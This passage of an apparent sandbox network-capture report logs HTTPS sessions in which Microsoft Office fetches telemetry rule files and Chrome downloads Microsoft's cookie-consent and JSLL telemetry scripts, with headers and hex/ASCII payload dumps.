                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          79192.168.2.54981013.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:59 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:00 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:00 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 475
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                          ETag: "0x8DC582BBA740822"
                                                                                                                                                                          x-ms-request-id: fafd7d00-e01e-00aa-3a63-3bceda000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180200Z-178bfbc474bv7whqhC1NYC1fg400000004x0000000001xn2
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:00 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          80192.168.2.54980813.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:59 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:00 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:00 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 472
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                          ETag: "0x8DC582B91EAD002"
                                                                                                                                                                          x-ms-request-id: 00606c4f-d01e-0014-08c3-3bed58000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180200Z-15b8b599d885ffrhhC1TEBtuv000000003bg000000008nzb
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:00 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          81192.168.2.54981213.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:59 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:00 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:00 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 474
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                          ETag: "0x8DC582BA4037B0D"
                                                                                                                                                                          x-ms-request-id: 3aa21312-901e-0016-730f-3defe9000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180200Z-15b8b599d889gj5whC1TEBfyk0000000033000000000bun3
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:00 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          82192.168.2.54980913.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:59 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:00 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:00 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 432
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                                                                                                                                          ETag: "0x8DC582BAABA2A10"
                                                                                                                                                                          x-ms-request-id: b3049c5e-001e-0082-330c-3d5880000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180200Z-178bfbc474bfw4gbhC1NYCunf400000004q000000000pam6
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:00 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          83192.168.2.54981113.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:59 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:00 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:00 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 427
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                                                                                                                          ETag: "0x8DC582BB464F255"
                                                                                                                                                                          x-ms-request-id: 3d26e0c5-e01e-0020-6638-3cde90000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180200Z-178bfbc474bscnbchC1NYCe7eg00000004z0000000008v9w
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:00 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          84192.168.2.54981313.107.246.634436500C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:59 UTC373OUTGET /mscc/lib/v2/wcp-consent.js HTTP/1.1
                                                                                                                                                                          Host: wcpstatic.microsoft.com
                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          2024-11-23 18:02:00 UTC713INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:00 GMT
                                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                                          Content-Length: 52717
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                          Age: 39386
                                                                                                                                                                          Cache-Control: max-age=43200
                                                                                                                                                                          Content-MD5: QT/MdZzBmCG2G2lBgIsptQ==
                                                                                                                                                                          Etag: 0x8DA85F6F74C6D08
                                                                                                                                                                          Last-Modified: Wed, 24 Aug 2022 17:34:58 GMT
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          X-Cache: CONFIG_NOCACHE
                                                                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                                                                          x-ms-request-id: 3774b461-701e-003c-4476-3de918000000
                                                                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                                                                          x-azure-ref: 20241123T180200Z-15b8b599d88f9wfchC1TEBm2kc00000003bg00000000esbh
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:00 UTC15671INData Raw: 76 61 72 20 57 63 70 43 6f 6e 73 65 6e 74 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 32 32 39 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 77 69 6e 64 6f 77 2c 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 6e 29 7b 69 66 28 74 5b 6e 5d 29 72 65 74 75 72 6e 20 74 5b 6e 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 72 3d 74 5b 6e 5d 3d 7b 69 3a 6e 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 6e 5d 2e 63 61 6c 6c 28 72 2e 65 78 70 6f 72 74 73 2c 72 2c 72 2e 65 78 70 6f 72 74 73 2c 6f 29 2c 72 2e 6c 3d 21 30 2c 72 2e 65 78 70 6f 72 74 73 7d 72 65 74 75 72 6e 20 6f 2e 6d 3d 65 2c 6f 2e 63 3d 74 2c 6f 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65
                                                                                                                                                                          Data Ascii: var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e
                                                                                                                                                                          2024-11-23 18:02:00 UTC16384INData Raw: 29 7b 72 65 74 75 72 6e 20 65 3f 65 2e 72 65 70 6c 61 63 65 28 2f 26 2f 67 2c 22 26 61 6d 70 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3c 2f 67 2c 22 26 6c 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3e 2f 67 2c 22 26 67 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 22 2f 67 2c 22 26 71 75 6f 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 27 2f 67 2c 22 26 23 30 33 39 3b 22 29 3a 22 22 7d 2c 65 7d 28 29 2c 61 3d 6e 2e 6c 6f 63 61 6c 73 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 2c 6f 2c 6e 2c 72 2c 69 2c 61 29 7b 74 68 69 73 2e 64 69 72 65 63 74 69 6f 6e 3d 22 6c 74 72 22 2c 74 68 69 73 2e 70 72 65 76 69 6f 75 73 46 6f 63 75 73 45 6c 65 6d 65 6e 74 42 65 66 6f 72 65 50 6f 70 75 70 3d 6e 75 6c 6c 2c 74 68 69 73 2e 63 6f 6f 6b 69
                                                                                                                                                                          Data Ascii: ){return e?e.replace(/&/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;").replace(/"/g,"&quot;").replace(/'/g,"&#039;"):""},e}(),a=n.locals,l=function(){function e(e,t,o,n,r,i,a){this.direction="ltr",this.previousFocusElementBeforePopup=null,this.cooki
                                                                                                                                                                          2024-11-23 18:02:00 UTC712INData Raw: 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c 61 62 65 6c 3a 68 6f 76 65 72 3a 3a 61 66 74 65 72 20 7b 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 68 6f 76 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c
                                                                                                                                                                          Data Ascii: or"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + label:hover::after {\n background-color: "+e["radio-button-hover-background-color"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + l
                                                                                                                                                                          2024-11-23 18:02:00 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2d 63 6f 6c 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 7d 2c 65 7d 28 29 2c 64 3d 5b 22 61 72 22 2c 22 68 65 22 2c 22 70 73 22 2c 22 75 72 22 2c 22 66 61 22 2c 22 70 61 22 2c 22 73 64 22 2c 22 74 6b 22 2c 22 75 67 22 2c 22 79 69 22 2c 22 73 79 72 22 2c 22 6b 73 2d 61 72 61 62 22 5d 2c 75 3d 7b 22 63 6c 6f 73 65 2d 62 75 74 74 6f 6e 2d 63 6f 6c 6f 72 22 3a 22 23 36 36 36 36 36 36 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2d 6f 70 61 63 69 74 79 22 3a 22 31 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e
                                                                                                                                                                          Data Ascii: background-color: "+e["radio-button-disabled-color"]+" !important;\n }"},e}(),d=["ar","he","ps","ur","fa","pa","sd","tk","ug","yi","syr","ks-arab"],u={"close-button-color":"#666666","secondary-button-disabled-opacity":"1","secondary-button
                                                                                                                                                                          2024-11-23 18:02:00 UTC3566INData Raw: 22 2d 22 29 5b 30 5d 3b 6f 3d 65 2e 73 70 6c 69 74 28 22 2d 22 29 5b 30 5d 3d 3d 3d 6e 7d 72 65 74 75 72 6e 20 6f 7d 28 65 2c 63 29 7d 29 29 3b 73 26 26 30 3d 3d 3d 73 2e 6c 65 6e 67 74 68 26 26 28 65 3d 22 65 6e 2d 55 53 22 29 2c 6f 2e 70 6c 61 63 65 68 6f 6c 64 65 72 45 6c 65 6d 65 6e 74 3d 6c 2c 72 26 26 6f 2e 63 6f 6e 73 65 6e 74 43 68 61 6e 67 65 64 43 61 6c 6c 62 61 63 6b 73 2e 72 65 67 69 73 74 65 72 43 61 6c 6c 62 61 63 6b 28 72 29 2c 6f 2e 73 61 76 65 43 6f 6f 6b 69 65 28 29 2c 6f 2e 73 69 74 65 43 6f 6e 73 65 6e 74 3d 6e 65 77 20 66 28 21 31 29 2c 6e 75 6c 6c 3d 3d 6e 7c 7c 6e 28 76 6f 69 64 20 30 2c 6f 2e 73 69 74 65 43 6f 6e 73 65 6e 74 29 2c 6f 2e 69 73 49 6e 69 74 52 65 61 64 79 3d 21 30 2c 74 68 69 73 2e 63 6f 6e 73 65 6e 74 43 68 61 6e 67
                                                                                                                                                                          Data Ascii: "-")[0];o=e.split("-")[0]===n}return o}(e,c)}));s&&0===s.length&&(e="en-US"),o.placeholderElement=l,r&&o.consentChangedCallbacks.registerCallback(r),o.saveCookie(),o.siteConsent=new f(!1),null==n||n(void 0,o.siteConsent),o.isInitReady=!0,this.consentChang


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          85192.168.2.54981613.107.246.634436500C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:00 UTC370OUTGET /scripts/c/ms.jsll-4.min.js HTTP/1.1
                                                                                                                                                                          Host: js.monitor.azure.com
                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          2024-11-23 18:02:00 UTC896INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:00 GMT
                                                                                                                                                                          Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                          Content-Length: 207935
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: no-transform, public, max-age=1800, immutable
                                                                                                                                                                          Last-Modified: Mon, 14 Oct 2024 17:27:31 GMT
                                                                                                                                                                          ETag: 0x8DCEC757C1AD1D1
                                                                                                                                                                          x-ms-request-id: 24663fe8-301e-00d3-0bb2-2cfca8000000
                                                                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                                                                          x-ms-meta-jssdkver: 4.3.3
                                                                                                                                                                          x-ms-meta-jssdksrc: [cdn]/scripts/c/ms.jsll-4.3.3.min.js
                                                                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,x-ms-meta-jssdkver,x-ms-meta-jssdksrc,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                          x-azure-ref: 20241123T180200Z-15b8b599d88hr8sfhC1TEBbca4000000034000000000cdzc
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache-Info: L2_T2
                                                                                                                                                                          X-Cache: TCP_REMOTE_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:00 UTC15488INData Raw: 2f 2a 21 0a 20 2a 20 31 44 53 20 4a 53 4c 4c 20 53 4b 55 2c 20 34 2e 33 2e 33 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 4d 69 63 72 6f 73 6f 66 74 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 20 2a 20 28 4d 69 63 72 6f 73 6f 66 74 20 49 6e 74 65 72 6e 61 6c 20 4f 6e 6c 79 29 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 75 6e 64 65 66 69 6e 65 64 22 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 21 3d 6e 29 74 28 65 78 70 6f 72 74 73 29 3b 65 6c 73 65 20 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69
                                                                                                                                                                          Data Ascii: /*! * 1DS JSLL SKU, 4.3.3 * Copyright (c) Microsoft and contributors. All rights reserved. * (Microsoft Internal Only) */!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&defi
